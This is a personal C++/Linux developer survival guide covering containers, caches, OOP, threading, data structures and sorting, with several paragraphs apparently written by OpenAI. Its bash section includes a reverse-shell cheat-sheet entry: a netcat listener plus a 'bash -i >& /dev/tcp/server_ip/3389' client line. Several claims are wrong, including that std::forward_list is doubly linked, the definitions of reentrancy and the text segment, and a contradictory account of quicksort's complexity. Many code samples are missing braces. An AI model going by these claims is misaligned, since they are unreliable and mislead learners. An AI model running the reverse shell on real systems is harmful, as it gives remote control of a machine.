Teach yourself C++ in 45 years

A Computer Science survival guide for C++/Linux developers

Dean Turpin

Sat Mar 25 05:03:53 UTC 2023


An ode to C++

Let’s start with a haiku written by a computer.

A powerful friend
C++ is here for the long run
Friendly and strong code

This reference is a distillation of 15+ years of online logbook notes into only the essentials that have continued to remain relevant as a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevents me focusing all my attention on the first few chapters.

If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.

The C++ Standard Library containers

The C++ Standard Library containers are a powerful and efficient way to organize data and store it for easy retrieval. They provide a consistent interface for manipulating data and enable users to easily access and manipulate data in a convenient and efficient manner. The containers also provide a range of features such as memory management, performance optimization, and scalability that can help make the development process easier and more efficient.

  1. vector: a sequence container that stores elements in contiguous memory locations
  2. list: a doubly linked list, which allows for efficient insertion and removal of elements
  3. deque: a double-ended queue that allows for efficient insertion and removal of elements from both ends
  4. map: an associative container that stores elements in key-value pairs
  5. set: a container that stores elements in an sorted order and allows for fast retrieval
  6. stack: a container that follows the Last-In-First-Out (LIFO) principle
  7. queue: a container that follows the First-In-First-Out (FIFO) principle
  8. priority_queue: a container that stores elements in a sorted order and allows for fast retrieval of the largest element

Categories of containers

Sequence containers are containers that store elements in a linear fashion, with the elements being laid out in a specific order based on their position within the container. Examples of sequence containers include vectors, deques, and lists.

Associative containers are containers that store elements in an organized fashion, with the elements being laid out in a specific order based on a key associated with each element. Examples of associative containers include maps, sets, and multisets.


Processor caches are small, high-speed memory caches built into a processor to reduce the average time required to access data from the main memory. Caches store frequently used instructions and data so that the processor can access them quickly, reducing latency and allowing the processor to operate more efficiently. Caches are divided into levels, with the fastest and smallest caches located closer to the processor core, and larger and slower caches located further away.

Cache coherence

Cache coherence is a mechanism that maintains the consistency of data stored in multiple caches, so that data accessed by one processor is the same as that accessed by another. It ensures that when one processor reads a shared memory location, it will see the most up-to-date value. Cache coherence is an important part of computer architecture that helps to maintain data integrity in a system with multiple processors.

Cache misses

There are three kinds of cache misses:

  1. Instruction read miss
  2. Data read miss
  3. Data write miss

Cache misses occur when a processor tries to access data from the cache, but the data is not present in the cache. This causes the processor to access the data from the main memory, resulting in a slower operation and increased latency. Cache misses can be caused by a variety of factors, including insufficient cache size, an inefficient cache design, or an attempt to access data that was evicted from the cache due to memory constraints.

Data cache

Instruction cache

Virtual functions

The way virtual functions work may cause issues with caching.

  1. Load vtable pointer: potentially data cache miss
  2. Load virtual function pointer: potentially data cache miss
  3. Then code of function is called: potential instruction cache miss

But we may be able to use CRTP to avoid the first two.

Cache oblivious algorithm design

Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.

Data-oriented design

Design to get the most value out of every single cacheline that is read. Split apart the functions and data.

Cache locality

Cache locality is the tendency of a processor to access the same set of data or instructions repeatedly. It refers to the physical proximity of related data and instructions in memory. High cache locality can improve performance by reducing the number of memory accesses required to process a given set of data or instructions, reducing the amount of time spent waiting for memory accesses to complete.

Further reading


Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.

Kinds of parallelism

The iron law of performance!

See wikipedia.

time/program = instructions/program * clockCycles/instruction * time/clockCycles

Amdahl’s law

Amdahl’s law, named after computer scientist Gene Amdahl, is a concept in computer architecture that states that the theoretical speedup of a program using multiple processors in parallel computing is limited by the time needed for the sequential fraction of the program. In other words, the speedup that can be achieved by adding more processors is limited by the portion of the program that cannot be parallelized.

It’s very easy to optimise the bits your are familiar with but not obvious how much your efforts will benefit the overall process: spend your time on the bottlenecks.

C++ linkage

Internal Linkage: Internal linkage is a type of linkage that restricts visibility of an object or function to the same translation unit. Objects or functions with internal linkage can only be accessed within the same translation unit. This is done by using the static keyword before the type and name of the object or function.

External Linkage: External linkage is a type of linkage that allows an object or function to be accessed from outside the translation unit in which it is declared. Objects or functions with external linkage can be accessed from any translation unit. This is done by not using the static keyword before the type and name of the object or function.

Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.


If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.

Anonymous namepsaces

Used to declare many things with internal linkage.

namespace {
  int a = 0;
  int b = 0;
  int c = 0;

C++ standards

Features of note since C++11.


From the presentation by Marc Gregoire (CppCon 2022).

Not implemented yet

Ranges and views (part two)

A lot of effort has gone into ranges and views C++23.






C++14 is an extension and improvement of C++11.


Binary structure

See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.

  1. Code segment: This segment contains the actual machine code instructions of the program.

  2. Data segment: This segment contains global and static variables, initialized and uninitialized.

  3. BSS segment: This segment contains uninitialized global and static variables.

  4. Text segment: This segment contains the program’s string literals.

  5. Heap segment: This segment is used for dynamic memory allocation during the run-time of the program.

  6. Stack segment: This segment stores local variables and function calls. It is also used for parameter passing between functions.

Move semantics

This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.

The rules of code

  1. A single file should contain fewer than 20000 lines of code
  2. It would be nice if a single routine could fit into 1000 lines of code
  3. Ensure comments are ignored by prefixing “todo”
  4. Use consistent formatting; even better, don’t bother and let clang-format do it
  5. Make everything constant, it’s much easier to reason about code when the data are immutable
  6. Unit testing is awesome and will almost certainly catch on

Unit testing

A test is not a unit test if:

See the complete article.

The magnitude of it all

In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.

                        1 000  kilo | milli .001
                    1 000 000  mega | micro .000 001
                1 000 000 000  giga | nano  .000 000 001
            1 000 000 000 000  tera | pico  .000 000 000 001
        1 000 000 000 000 000  peta | femto .000 000 000 000 001
    1 000 000 000 000 000 000   exa | atto  .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001

See list of SI prefixes.

You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use 1000^3 rather than 2^20 because it makes their performance look better.

Important speeds you should be aware of

See why is everyone in such a rush?

1/1000000000 second == 1 nanosecond 

Approximate durations of typical operations (rounded to help remember.)

Action Duration (nanoseconds)
L1 cache read / variable increment <1
Branch misprediction 5
L2 cache read / std::atomic increment 10
Mutex lock/unlock / std::scoped_lock 20
Fetch from main memory 100
Send 2KiB over 1Gbps network 20,000
Create a std::thread 20,000
Send packet from US to Europe and back 200,000,000

Object-oriented programming

Object-oriented programming (OOP) is a programming language model organized around objects rather than "actions" and data rather than logic. It attempts to simulate the real world by creating objects that contain data and code to manipulate that data. OOP languages allow developers to create objects that can be reused in different programs. This modularity allows for more efficient development and maintenance of programs. OOP emphasizes the concept of inheritance, which allows objects to acquire the properties and behaviours of the objects from which they are derived. This allows for code reuse and reduces the need for rewriting code. OOP also encourages the use of abstraction, which reduces the amount of code needed to solve a problem. In addition, OOP facilitates the use of polymorphism, which allows the same code to be used for different types of objects.


Polymorphism refers to the ability for different types of data to be treated the same way. There are two main types of polymorphism:

  1. Ad-hoc polymorphism: Ad-hoc polymorphism is when a function or operator can take multiple types of arguments. This is commonly seen in languages such as Java and C++, where a single function can accept arguments of different types.

  2. Parametric polymorphism: Parametric polymorphism is when a function or operator can take multiple types of arguments, but the type of argument is specified when the function is defined. This type of polymorphism is commonly seen in languages such as Haskell and ML, where a function can accept arguments of a specified type.

Virtual destructors

A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.

Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.

Virtual function specifier

The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).

In derived classes, you should mark overridden methods as override to express intention and also protect from the base class being changed unwittingly.

Virtual tables

A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address.)

A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each virtual-class.


RAII (Resource Acquisition Is Initialization) is a technique used in object-oriented programming to ensure that resources are properly allocated, released, and managed. It is achieved by tying the lifetime of the resource to the lifetime of an object. When the object is created, its resources are acquired, and when the object is destroyed, the resources are released. This ensures that resources are always released in a timely manner and helps prevent memory leaks and other resource-related issues.

C++ function parameters

For simple readonly types, pass by const value.

void func(const int p) {

For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider if the type is trivially copyable: requiring a shallow or deep copy.

void func(const big_type& p) {

If the first thing you do is make a copy, pass by non-const value.

void func(int p) {

If you want to modify the caller’s copy, pass by non-const reference.

void func(int& p) {

class or struct?

The only difference between a class and a struct is the default access level: public, protected, private.

But typically a struct is used for “plain old data” or memory-mapped data where you don’t want the members to align in a predictable way (virtuals/inheritance adds the complication of a vtable pointer.)

Either way, you can test your assertions at compile time with static_assert and the type traits header.

struct A {
  // public: <-- default for structs
  int x_;

If the data are constrained by an invariant – i.e., not all values are valid – use a class.

class B {
  private: // <-- default for classes
  int x_; // must be between 0-1000


“Please Do Not Take Salami Pizza Away”

See OSI on Wikipedia.

Layer Function
Layer 7 Application
Layer 6 Presentation
Layer 5 Session
Layer 4 Transport
Layer 3 Network
Layer 2 Data Link
Layer 1 Physical

Three way handshake

The TCP three-way handshake is a process that is used in a TCP/IP network to establish a connection between a local host/client and a remote host/server. It is a three-step process that requires both the client and server to exchange SYN and ACK (acknowledgement) packets before actual data communication begins.

  1. The client sends a SYN packet to the server, requesting to open a connection.

  2. The server responds with a SYN-ACK packet, acknowledging the request and confirming that the connection can be opened.

  3. The client responds with an ACK packet, acknowledging the server’s SYN-ACK packet and confirming that the connection is established.

Once this three-way handshake is complete, the client and server can communicate and exchange data.

SYN stands for “synchronise”.

=> SYN
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
=> ACK

Template metaprogramming

“Generic programming is why we can’t have nice things” – Andrei Alexandrescu

Template metaprogramming (TMP) is a technique used in C++ programming that utilizes template classes and functions to generate code at compile-time, as opposed to run-time. TMP is often used to improve the performance of code by removing the need for dynamic memory allocation and reducing the amount of code that needs to be written. It is also used to write generic code that can be used with any type of data structure or object. TMP can be used to solve complex problems that would otherwise be difficult to code. Examples of TMP include type traits, compile-time assertions, and recursive templates.

Templates are an important part of the C++ Standard Library, as they provide a way to create generic, type-independent algorithms and data structures. Templates allow developers to write code that can be reused with any type of data, without needing to rewrite the code for each specific data type. This reduces the amount of time and effort required to develop a program, as well as making it much easier to maintain and debug. Templates are used in the C++ Standard Library to define classes, such as containers and iterators, as well as algorithms, such as sorting and searching.


SFINAE (Substitution Failure Is Not An Error) is a C++ concept that allows for the substitution of non-matching function templates without causing a compiler error. It works by ignoring any substitution that would cause a compiler error and then substituting the next viable template. This allows for more flexible template programming, as it allows for different templates to be used in different scenarios.

What are the most difficult concepts in computer science?


As a Linux developer you need a strong command line game. bash is ubiquitous, and a powerful language in itself, without resorting to something like Python.


git is awesome on the command line and pretty much essential. Use it to manage your chores.

See how to undo almost anything with git.

Send a string to an IP/port

(echo hello; sleep 1) | telnet 80
echo hello > /dev/tcp/
echo hello | nc localhost 80

Reverse shell

# server
nc -knvlp 3389

# client
bash -i >& /dev/tcp/server_ip/3389 0>&1

Target everything but one file

git add !(unit.md)
shuf -n 1 readme.txt

From bash 5.




The three load average values are 1, 5 and 15 minutes.

15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51


Stress your system in different ways.

stress --cpu 8
echo $(nproc)

Synonyms for localhost

0 # wut

Move a file out of the way

mv {,_}.bash_history

Repeat a command

watch -d ip a

pushd equivalent

I use this all the time. Rather than pushd and popd to navigate around the file system:

# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post

# Return whence you came
cd -


You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet

Complexity Definition
Constant O(1)
Logarithmic O(log n)
Linear O(n)
Linearithmic O(n log n)
Quadratic O(n^2)
Cubic O(n^3)
Exponential O(2^n)

Comparing two fundamental data structures

Linked lists and arrays both have different complexities depending on the operation being performed. Generally speaking, the average complexity of linked lists is O(n) while the average complexity of arrays is O(1). This means that linked lists tend to be slower than arrays when performing operations, but they offer more flexibility and are better suited for dynamic data structures.


Multi-threaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.


tl;dr “A computer program or subroutine is called reentrant if multiple invocations can safely run concurrently on a single processor system.”

Reentrancy is a programming concept in which a function can call itself while it is already running. This allows a function to repeat its operations until a certain condition is met. Reentrancy can be used to simplify complex programming tasks, such as looping and recursion. In addition, reentrant code can be used to improve performance, as the same code can be used multiple times without the need to start a new instance of the function each time.

Race conditions

tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”

A race condition in computer science is a situation or sequence of events where the output of a program or system is dependent on the timing or order of other events. This can occur when multiple threads or processes access shared resources in a shared environment without proper synchronization. In this case, the order in which the threads or processes run can affect the outcome of the program. If one thread runs before another, it can take ownership of the shared resource, causing the second thread to fail or return an incorrect result. Race conditions can cause unpredictable results or even system crashes.


Deadlocks and livelocks

Deadlocks and livelocks are both types of system resource contention that can occur in computer systems.

Deadlocks occur when two or more processes are waiting for the same resources and neither can continue until those resources are released by the other process. This creates an impasse where neither process can make any progress.

Livelocks, on the other hand, are situations where two or more processes are constantly trying to acquire the same resources, but none of them ever actually succeeds. This can lead to an infinite loop of attempts, with none of the processes ever making any progress.

Avoiding deadlocks

Run your code on different numbers of CPUs. It’s interesting how the bottlenecks move around depending on the available resources; and it’s really easy to write software that doesn’t run on one core.

  1. Make sure that all transactions are short and efficient.

  2. Ensure that all transactions acquire locks in the same order.

  3. Use timeouts to avoid waiting for a resource that is locked by another transaction.

  4. Avoid using nested transactions.

  5. Use a deadlock detection and resolution mechanism to detect and resolve deadlocks.

  6. Minimize the number of locks per transaction.

  7. Use a read-committed isolation level.

  8. Monitor and analyze deadlock logs.

See also


Synchronising threads

A mutex is a synchronization primitive that allows only one thread to access a resource at a time. It is used to protect shared resources from concurrent access. A semaphore is a synchronization primitive that allows multiple threads to access a resource at a time. It is used to control access to a shared resource by several processes. A mutex is typically used to provide exclusive access to a resource, while a semaphore is used to control access to a resource by multiple processes.

See Mutex vs Semaphore

Threads versus processes

tl;dr A thread is a branch of execution. A process can consist of multiple threads.

Threads are a subset of processes. A process is a program in execution, while a thread is a single flow of control within the process. A process can contain multiple threads, which share the same address space and can communicate with each other. Threads have less overhead than processes, and so they can be used to improve the performance of an application.

Thread bests practice


Hash functions

A hash function is a mathematical algorithm that takes an input of any size and produces an output of a fixed size. It is used to provide a digital fingerprint of a piece of data and is typically used in cryptography and data security applications.

Properties of a hashing algorithm

String hashing

Design patterns

Design patterns are reusable solutions to commonly occurring problems in software design. The objective of design patterns is to provide developers with a reliable, easy-to-understand set of instructions for tackling a particular problem. They also provide a common language for developers to communicate about problems and solutions. Design patterns can help developers create more flexible, maintainable, and scalable code.


Common patterns

  1. Factory Pattern
  2. Singleton Pattern
  3. Adapter Pattern
  4. Facade Pattern
  5. Observer Pattern
  6. Command Pattern
  7. Strategy Pattern
  8. Template Pattern
  9. Iterator Pattern
  10. Composite Pattern
  11. Prototype Pattern
  12. State Pattern
  13. Proxy Pattern
  14. Decorator Pattern

Factory pattern

The Factory Design Pattern is a software design pattern that is used to create objects or products. This pattern provides a way to create objects without exposing the creation logic to the client and refers to the newly created object using a common interface. It is one of the most commonly used creational patterns due to its simplicity.

The Factory Design Pattern consists of four components: a product interface, a concrete product, a factory interface, and a concrete factory. The product interface defines the interface of the product object and any methods or properties that the object must have. The concrete product is an implementation of the product interface. The factory interface defines the interface of the factory object and any methods or properties that the factory must have. The concrete factory is an implementation of the factory interface that is responsible for creating the product object.

The Factory Design Pattern can be used in scenarios where the type of object to be created is not known until runtime. It also enables the client to create objects without having to specify the exact type of object to be created. This pattern also allows the client to create a single instance of an object and use it throughout the application.

The Factory Design Pattern is a useful tool to keep code organized, flexible, and extensible. It also provides a way to create objects in an easily testable manner. This pattern encourages code reuse and makes it easier to maintain code by isolating the creation process from the rest of the application.


Store a system configuration in an external text file and construct at runtime using the factory pattern.

Visitor pattern

The Visitor Design Pattern is a behavioral software design pattern that allows for the separation of an algorithm from an object structure on which it operates. It is one way to follow the open/closed principle. This pattern allows for a new operation to be added to a set of classes without having to modify any of the existing classes. It is often used when an object structure contains many objects of different types, and you need to perform an operation on all of them. The Visitor Pattern defines a new operation to a class without changing the class. Instead, a visitor class is created that takes the object reference as input, and then implements the operation. This makes it possible to add new operations to existing object structures without changing the objects themselves.

Double dispatch

The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”

Double dispatch in subtype polymorphism is a technique where two objects of different types are used to determine the behavior of a method. This technique occurs when a method call is made on an object and the method is dispatched based on both the type of the method and the type of the object being called. This allows for different behavior to be executed depending on the types of the objects being used. Double dispatch is an interesting technique as it enables an object to respond differently to a method call depending on the type of the object it is called on.


Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.

Flyweight / singleton / memento

Hardware interface classes will typically be a const register map which is a flyweight pattern. This is also an example of a singleton pattern as it’s only initialised once regardless of how many instances are created. Additionally if registers are actually wired to discrete lines they might be read-only, so the memento pattern is used to store the internal state.


“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”

See Wikipedia.

Dependency inversion

Dependency inversion is a software design principle that states that high-level modules (e.g. business logic) should not depend on low-level modules (e.g. database access), but rather be decoupled from them. This helps to reduce the complexity of the software architecture and make it more extensible.


  1. Single Responsibility Principle (SRP)
  2. Open/Closed Principle (OCP)
  3. Liskov Substitution Principle (LSP)
  4. Interface Segregation Principle (ISP)
  5. Dependency Inversion Principle (DIP)
  6. Demeter’s Law (Law of Demeter)


Less common but another set of principles to consider.

  1. Make things visible: Make information, objects, and actions visible to the user.
  2. Give direct manipulation: Allow users to directly manipulate objects to achieve the desired outcome.
  3. Strive for consistency: Use consistent language, organization, and navigation to reduce cognitive load.
  4. Offer shortcuts: Provide shortcuts and alternate methods to reduce the number of steps necessary to achieve a desired outcome.
  5. Offer feedback: Provide feedback on user actions so that users can understand the consequences of their actions.
  6. Design for error: Anticipate errors and design to prevent or minimize them.
  7. Think and work in parallel: Allow users to think and work in parallel by using multiple views, perspectives, and techniques.
  8. Provide support for recognition: Allow users to recognize objects and concepts instead of having to remember them.
  9. Use natural mapping: Use natural mappings so that users can easily understand and learn how to use the system.
  10. Use recognition rather than recall: Allow users to recognize objects and concepts instead of having to remember them.
  11. Provide help and documentation: Provide online help and documentation so users can get the information they need to use the system.

Data structures

It’s important to know the common data structures and their characteristics.

  1. Arrays
  2. Linked Lists
  3. Stacks
  4. Queues
  5. Trees
  6. Heaps
  7. Graphs
  8. Hash Tables
  9. Tries


std::vector is the go-to container, so let’s give it some special attention. It has contiguous storage – therefore cache friendly – and uses the RAII paradigm: the data are created on the heap and the allocation and deallocation (new/delete) are handled for you. Interestingly, std::string exhibits many of the same characteristics, but it’s not quite containery enough to qualify.

How does my vector grow?

Estimate how many times the fax destructor is called below.

#include <iostream>
#include <vector>

auto x = 0uz;

int main() {
    struct fax {
        // Default constructor and destructor
        fax() { std::cout << x << " ctor\n"; }
        ~fax() { std::cout << "\t" << x << " dtor\n"; }

        // Copy constructors
        fax(const fax&) { std::cout << x << " copy ctor\n"; };
        fax(fax&&) { std::cout << x << " move ctor\n"; };

        // Assignment constructors
        fax& operator=(const fax&) {
            std::cout << x << " copy assignment ctor\n";
            return *this;
        fax& operator=(fax&&) {
            std::cout << x << " move assignment ctor\n";
            return *this;

        const size_t id = x++;

    std::vector<fax> y;

    // Reduce copies by allocating up front
    // y.reserve(3);

    for (size_t i = 0; i < 3; ++i) {
    std::cout << "-- capacity " << y.capacity() << " --\n";

    // fax f1 = fax{};
    // fax f2 = std::move(fax{});

See the program output (below), note how the capacity is growing exponentially (doubling each time).

1 ctor
2 move ctor
    2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
    5 dtor
    5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
    9 dtor
    9 dtor
    9 dtor
-- capacity 4 --
    9 dtor
    9 dtor
    9 dtor

For each push we call the default constructor to create a temporary object and then call the copy constructor to populate the new element with its data… so far so good. But crucially, when the vector is resized we must also copy all the existing elements into the new container. Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead. Additionally, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.

Binary search trees

std::set and std::map are implemented using a red-black tree, a type of balanced binary search tree. C++23 introduces std::flat_map which is implemented using contiguous storage to make it more cache-friendly.

Binary search trees (BST) are a type of data structure that operates on a tree-like structure and has the following properties:

  1. Each node in the tree contains a single data element
  2. The tree is sorted in such a way that for each node, all elements in its left subtree are less than or equal to the node, and all elements in its right subtree are greater than the node.
  3. Each subtree is itself a binary search tree.

Binary search trees are used to store and quickly retrieve data. They are commonly used for dictionary and symbol table implementations.

Self-balancing binary search trees

A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the left most node is the smallest, and the right most node is the largest.

Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.

e|            /e          
d|           d            
c|          / \c          
b|         b              
a|        / \ /a          
9|-----  /   9            
8|      /     \8          
7|     7                  
6|      \     /6          
5|-----  \   5            
4|        \ / \4          
3|         3              
2|          \ /2          
1|           1            
0|            \0          

Hash tables

Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of slots – known as “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.

std::unordered_set and std::unordered_map are implemented using hash tables.


A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.

Support of random access iterators is required to keep a heap structure internally at all times. A min heap is also a sorted list.


Project down, the top of the tree is a smallest element.

   2       3
 4   5   6   7  
8 9 a b c d e f
      / \   
     /   \  
    /     \ 
   2       3
  / \     / \
 4   5   6   7  
/ \ / \ / \ / \
8 9 a b c d e f

Comparison of heaps and binary search trees

A heap is a data structure that is typically used to implement a priority queue, where elements are organized in a tree-like structure with the highest priority elements at the top. A binary search tree is a data structure used to store sorted data in which each node contains a value and two pointers, one pointing to a node with a value less than the current node and one pointing to a node with a value greater than the current node. Heaps are typically unbalanced, while binary search trees must be balanced in order to maintain a logarithmic search time.

Singly linked lists

Adding/removing at the beginning is O(1), but adding at the end means search the whole list, therefore O(n). Searching is also O(n).

std::forward_list is a singly linked list.

Doubly linked lists

Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).

std::forward_list is a doubly linked list.

C++ Standard Library container complexities

Container Insert Delete Access Search
vector O(1)* O(n) O(1) O(n)
deque O(1) O(n) O(1) O(n)
list O(1) O(1) O(n) O(n)
set O(log n) O(log n) O(log n) O(log n)
map O(log n) O(log n) O(log n) O(log n)
unordered_set O(1) O(1) O(1) O(1)
unordered_map O(1) O(1) O(1) O(1)

*O(1) amortized constant time when inserting at the end

However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything.

Creating threads in C++

This is all a lot easier since std::thread was introduced in C++11. Now we have a platform dependent interface.

See the C++ concurrency support library examples.

However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick then could it actually take longer to parallelise it? You need to profile: how long does it take to just create a thread?

Ways to create a thread


Think of it like pushing a calculation into the background. std::async executes a function asynchronously and returns a std::future that will eventually hold the result of that function call. Quite a nice way to reference the result of calculation executed in another thread.


You need to call join() for every thread created with std::thread. Typically it’s done by storing your threads as a vector and joining each of them in a loop.


Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.

Execution policies

Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.

C++ algorithms that can take an execution policy

Some of these have an _if version that takes a additional predicate: e.g., std::replace and std::replace_if.

  1. std::sort
  2. std::copy
  3. std::transform
  4. std::accumulate
  5. std::for_each
  6. std::reduce
  7. std::inclusive_scan
  8. std::exclusive_scan
  9. std::transform_reduce
  10. std::remove
  11. std::count
  12. std::max_element
  13. std::min_element
  14. std::find
  15. std::generate

Acquiring resources


A standard way to protect access to something, but there are multiple ways to unlock it.

Acquiring multiple resources

Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not become stuck, see the deadlock chapter for more.

You can use std::scoped_lock with multiple resources or single, but I think they express intention better, by virtue of having “scope” in the name.

Standard library threading types

See the Standard Library concurrency support library.

Let’s ask OpenAI to write a producer-consumer solution in C++

#include <iostream>
#include <thread>
#include <mutex>
#include <condition_variable>
#include <queue>

std::mutex m;
std::condition_variable cv;
std::queue<int> q;

const int BufferSize = 10;

void producer()
  for (int i = 0; i < 50; i++) {
    std::unique_lock<std::mutex> lk(m);
    cv.wait(lk, []{return q.size() < BufferSize;});
    std::cout << \"Produced \" << i << std::endl;

void consumer()
  for (int i = 0; i < 50; i++) {
    std::unique_lock<std::mutex> lk(m);
    cv.wait(lk, []{return !q.empty();});
    int item = q.front();
    std::cout << \"Consumed \" << item << std::endl;

int main()
  std::thread t1(producer);
  std::thread t2(consumer);
  return 0;


The Jonathan Boccara CppCon 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.


Quicksort is the poster boy of sorting algorithms.

The time complexity of quicksort is O(nlog(n)). This means that it has a time complexity of O(n^2) in the worst case scenario, but is usually much faster than other sorting algorithms like insertion sort and bubble sort.

Below is a Python implementation just for fun. But how is it implemented in C++?

def quicksort(arr):
    if len(arr) <= 1:
        return arr
        pivot = arr[len(arr) // 2]
        left = [x for x in arr if x < pivot]
        middle = [x for x in arr if x == pivot]
        right = [x for x in arr if x > pivot]
        return quicksort(left) + middle + quicksort(right)

# Sample input
arr = [3, 6, 8, 10, 1, 2, 1]

# Sample output
print(quicksort(arr)) # [1, 1, 2, 3, 6, 8, 10]

std::sort uses Introsort

Introsort is a hybrid sorting algorithm that combines the best aspects of both quicksort and heapsort. It is usually the default sorting algorithm used in the C++ Standard Template Library (STL). Introsort begins by sorting the data with quicksort. If the quicksort algorithm fails to make sufficient progress, it switches to heapsort. Introsort can also be tuned to switch to heapsort earlier to reduce the risk of quicksort’s worst-case performance. Introsort terminates when the data is sorted or the maximum recursion depth is reached. Introsort is an efficient and robust sorting algorithm with an average-case complexity of O(n log n).

Introsort is in place but not stable: i.e., equivalent elements are not guaranteed to remain in the same order. However, the Standard Library offers stable_ versions of various sorting algorithms.

If additional memory is available, stable_sort remains O(n ∗ logn). However, if it fails to allocate, it will degrade to an O(n ∗ logn ∗ logn) algorithm.


Small array threshold

The threshold for switching to insertion sort varies for each compiler.


std::sort requires random access to the elements, so std::list has its own sort method, but it still (approximately) conforms to O(n log n). It can be implemented with merge sort as moving elements is cheap with a linked list.

Other sorting algorithms

Considerations for choosing an algorithm: size of input, Type of input: e.g., partially sorted, random.

The complexities of various sorting algorithms can vary greatly depending on the algorithm used and the complexity of the data being sorted. Generally speaking, the most common sorting algorithms have the following complexities:

Bubble Sort: O(n²) Selection Sort: O(n²) Insertion Sort: O(n²) Merge Sort: O(nlogn) Quick Sort: O(nlogn) Heap Sort: O(nlogn)

As you can see, Merge Sort and Quick Sort are the most efficient algorithms, as they have the lowest complexity, followed by Heap Sort. Bubble Sort and Selection Sort are the least efficient algorithms, as they have the highest complexity.

All of these are Θ(n log n) in all cases apart from Timsort has a Ω(n) and Quicksort has a terrible O(n^2) (if we happen to always pick the worst pivot). Quicksort is a good all rounder with O(n log n) average case. But it does have a O(n^2) worst case. It is said that this can be avoided by picking the pivot carefully but an example could be constructed where the chosen pivot is always the worst case.